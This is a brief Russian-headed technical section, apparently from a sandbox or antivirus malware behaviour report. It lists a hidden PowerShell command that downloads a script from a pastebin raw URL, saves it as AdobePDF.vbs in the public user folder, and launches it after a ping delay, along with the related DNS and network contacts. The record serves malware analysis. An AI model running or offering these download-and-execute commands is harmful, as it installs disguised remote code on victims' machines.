Техническая информация
- https://pastebin.com/raw/dg0ebdfy как c:\users\public\adobepdf.vbs
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AdobePDF.vbs
- nul
- C:\users\public\adobepdf.vbs
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/DG0EBdFy','C:\Users\Public\AdobePDF.vbs')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AdobePDF.vbs' (со скрытым окном)
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10